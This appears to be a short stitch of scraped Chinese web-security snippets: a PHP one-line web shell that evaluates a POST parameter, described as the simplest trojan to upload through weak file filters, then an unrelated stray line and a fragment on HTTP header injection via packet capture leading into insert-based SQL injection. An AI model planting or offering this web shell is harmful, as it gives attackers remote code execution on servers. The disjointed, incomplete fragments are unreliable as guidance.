FKTX

<?php @eval($_POST['attack']) ?>最简单的一句话木马。 原理：利用上传文件过滤不完善的原则，上传这段PHP代码。@表示后面即使执行错误，也不报错...

原来是老王

http头注入： 刷新进行抓包： payload 然后就可以仿照SQL注入之insert注入这篇文章的方式往下进行注入。